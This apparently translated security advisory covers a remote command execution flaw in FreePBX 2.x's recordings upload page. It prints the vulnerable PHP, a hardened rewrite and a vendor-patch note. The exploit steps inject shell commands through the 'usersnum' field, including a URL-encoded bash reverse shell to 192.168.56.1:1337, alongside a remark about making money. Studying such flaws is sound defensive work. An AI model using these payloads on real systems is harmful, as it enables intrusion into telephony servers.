FreePBX 'usersnum' Parameter Remote Command Execution Vulnerability

Source: Internet
Author: User


Affected Systems:
FreePBX 2.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65756

FreePBX is an open source Web PBX solution.

FreePBX 2.x is affected by a remote command execution vulnerability. An attacker can exploit it to execute arbitrary commands in the context of the affected application.

Source: I-Hmx (n0p1337@gmail.com)

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users act at their own risk!

Vulnerable function "recording_addpage" @ admin/modules/recordings/page.recordings.php

```php
function recording_addpage($usersnum) {
	global $fc_save;
	global $fc_check;
	global $recordings_save_path;
?>
<div class="content">
	<h2><?php echo _("System Recordings")?></h2>
	<h3><?php echo _("Add Recording")?></h3>
	<h5><?php echo _("Step 1: Record or upload")?></h5>
	<?php if (!empty($usersnum)) {
		echo '<p>';
		echo _("Using your phone,")."<a href=\"#\" class=\"info\">"._("dial")."&nbsp;".$fc_save."<span>";
		echo _("Start speaking at the tone. Press # when finished.")."</span></a>";
		echo _("and speak the message you wish to record. Press # when finished.")."\n";
		echo '</p>';
	} else {?>
	<form name="xtnprompt" action="<?php $_SERVER['PHP_SELF']?>" method="post">
	<input type="hidden" name="display" value="recordings">
	<?php echo _("If you wish to make and verify recordings from your phone, please enter your extension number here:");?>
	<input type="text" size="6" name="usersnum" tabindex="<?php echo ++$tabindex;?>"><input name="Submit" type="submit" value="<?php echo _("Go");?>" tabindex="<?php echo ++$tabindex;?>">
	</form>
	<?php }?>
	<p></p>
	<form enctype="multipart/form-data" name="upload" action="<?php echo $_SERVER['PHP_SELF']?>" method="POST">
	<?php echo _("Alternatively, upload a recording in any supported Asterisk format. Note that if you're using .wav, (eg, recorded Microsoft Recorder) the file <b>must</b> be PCM Encoded, 16 Bits, 8000Hz")?>:<br>
	<input type="hidden" name="display" value="recordings">
	<input type="hidden" name="action" value="recordings_start">
	<!-- the request-supplied usersnum is echoed into the upload form and re-submitted with the file -->
	<input type="hidden" name="usersnum" value="<?php echo $usersnum?>">
	<input type="file" name="ivrfile" tabindex="<?php echo ++$tabindex;?>"/>
	<input type="button" value="<?php echo _("Upload")?>" onclick="document.upload.submit(upload); alert('<?php echo addslashes(_("Please wait until the page reloads."))?>');" tabindex="<?php echo ++$tabindex;?>"/>
	</form>
	<?php
	if (isset($_FILES['ivrfile']['tmp_name']) && is_uploaded_file($_FILES['ivrfile']['tmp_name'])) {
		if (empty($usersnum) || !ctype_digit($usersnum)) {
			$dest = "unnumbered-";
		} else {
			$dest = "{$usersnum}-";
		}
		// only the text after the last "." of the uploaded name is kept, with non-alphanumerics stripped
		$suffix = preg_replace('/[^0-9a-zA-Z]/', '', substr(strrchr($_FILES['ivrfile']['name'], "."), 1));
		$destfilename = $recordings_save_path.$dest."ivrrecording.".$suffix;
		move_uploaded_file($_FILES['ivrfile']['tmp_name'], $destfilename);
		// $destfilename is concatenated into shell command strings without escapeshellarg();
		// these are the lines the advisory is about
		system("chgrp ".$amp_conf['AMPASTERISKGROUP']." ".$destfilename);
		system("chmod g+rw ".$destfilename);
		echo "".$_FILES['ivrfile']['name'].""; // the markup around the file name was lost in extraction
		$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
	}?>
	<form name="prompt" action="<?php $_SERVER['PHP_SELF']?>" method="post" onsubmit="return rec_onsubmit();">
	<input type="hidden" name="action" value="recorded">
	<input type="hidden" name="display" value="recordings">
	<input type="hidden" name="usersnum" value="<?php echo $usersnum?>">
	<?php
	if (!empty($usersnum)) {?>
	<h5><?php echo _("Step 2: Verify")?></h5>
	<p><?php echo _("After recording or uploading,")."&nbsp;<em>"._("dial")."&nbsp;".$fc_check."</em>"._(" listen to your recording.")?></p>
	<p><?php echo _("If you wish to re-record your message, dial")."&nbsp;".$fc_save;?></p>
	<h5><?php echo _("Step 3: Name")?></h5><?php
	} else {
		echo ""; // the heading string printed in this branch was lost in extraction
	}?>
	<table style="text-align: right;">
	<tr valign="top">
	<td valign="top"><?php echo _("Name this Recording")?>:</td>
	<td style="text-align: left"><input type="text" name="rname" value="<?php echo $rname;?>" tabindex="<?php echo ++$tabindex;?>"></td>
	</tr>
	</table>

	<h6><?php
	echo _("Click \"SAVE\" when you are satisfied with your recording");
	echo "<input type=\"hidden\" name=\"suffix\" value=\"$suffix\">\n";?>
	<input name="Submit" type="submit" value="<?php echo _("Save")?>" tabindex="<?php echo ++$tabindex;?>"></h6>
	<?php recordings_form_jscript();?>
	</form>
</div>
<?php
}
```

Actually, as you can see, there are already exploitable lines there, but here I am interested in this line:
system("chmod g+rw ".$destfilename);
If you trace the function flow you will notice that 'destfilename' gets part of its value from the parameter $_REQUEST['usersnum'].
The function is called from
target/admin/config.php?type=setup&display=recordings
Before uploading, open Firebug,
search for usersnum,
and edit the value:
Fa; id> faris; fax
Or, for a back connection, use
Fa; bash % 20-i % 20% 3E % 26% 2 fdev % 2 ftcp % 2f192. 168.56.1% 2f1337% 20% 3E % 200%; faris
And you are ready to dominate, or even make some $ if you are interested ;)
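For comparison, here is a hardened version of the upload handling from the function above. This is an added example, not FreePBX's own code or the vendor's fix: it enforces a strict digit pattern on usersnum, derives the file suffix from an allow-list of extensions (the list itself is an assumption), and replaces the two system() calls with PHP's native chgrp()/chmod(), so no request-controlled value is ever concatenated into a shell command.

```php
<?php
// Hardened upload handling (added example, not FreePBX code).

function safe_usersnum(?string $usersnum): string {
    // Same decision as the original: anything that is not a short run of
    // digits falls back to the "unnumbered" prefix. The anchored pattern
    // rejects ";", "|", "$(", newlines and every other shell metacharacter.
    if ($usersnum === null || !preg_match('/^[0-9]{1,10}$/', $usersnum)) {
        return 'unnumbered-';
    }
    return $usersnum . '-';
}

function safe_suffix(string $uploaded_name): ?string {
    // Allow-list instead of "strip the bad characters" (list is assumed here).
    static $allowed = ['wav', 'gsm', 'ulaw', 'alaw', 'sln', 'g729'];
    $ext = strtolower(pathinfo($uploaded_name, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true) ? $ext : null;
}

function store_recording(array $file, ?string $usersnum, string $save_path, string $group): ?string {
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $suffix = safe_suffix($file['name'] ?? '');
    if ($suffix === null) {
        return null; // unknown extension: reject rather than guess
    }
    // The save path is a server-side setting, never request data; realpath()
    // normalises it and fails if the directory does not exist.
    $dir = realpath($save_path);
    if ($dir === false) {
        return null;
    }
    $dest = $dir . DIRECTORY_SEPARATOR . safe_usersnum($usersnum) . 'ivrrecording.' . $suffix;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    // Native calls take the path as an argument; there is no shell to inject into.
    // (If a shell call were unavoidable, every argument would need escapeshellarg().)
    if (!chgrp($dest, $group) || !chmod($dest, 0660)) {
        return null;
    }
    return $dest;
}
```

Usage in the page context would be `$stored = store_recording($_FILES['ivrfile'] ?? [], $usersnum, $recordings_save_path, $amp_conf['AMPASTERISKGROUP']);` with a null result treated as a rejected upload.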

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

FreePBX
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

http://freepbx.org/trac
